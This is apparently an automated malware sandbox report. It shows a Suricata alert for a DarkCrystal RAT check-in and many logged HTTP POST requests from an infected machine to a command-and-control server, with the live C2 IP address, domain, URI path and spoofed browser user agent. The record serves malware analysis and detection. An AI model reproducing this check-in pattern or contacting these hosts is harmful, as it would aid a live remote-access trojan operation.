Source: Network traffic; Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49712 -> 80.211.144.156:80
Source: Joe Sandbox View; IP Address: 80.211.144.156 80.211.144.156
Source: Joe Sandbox View; ASN Name: ARUBA-ASNIT ARUBA-ASNIT
Source: global traffic; HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 373292cm.nyashka.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 373292cm.nyashka.top | Content-Length: 384 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 373292cm.nyashka.top | Content-Length: 1808 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 373292cm.nyashka.top | Content-Length: 2504 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 373292cm.nyashka.top | Content-Length: 2504 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 373292cm.nyashka.top | Content-Length: 2504 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 373292cm.nyashka.top | Content-Length: 2504 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1808Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 134140Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1816Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1808Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1808Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
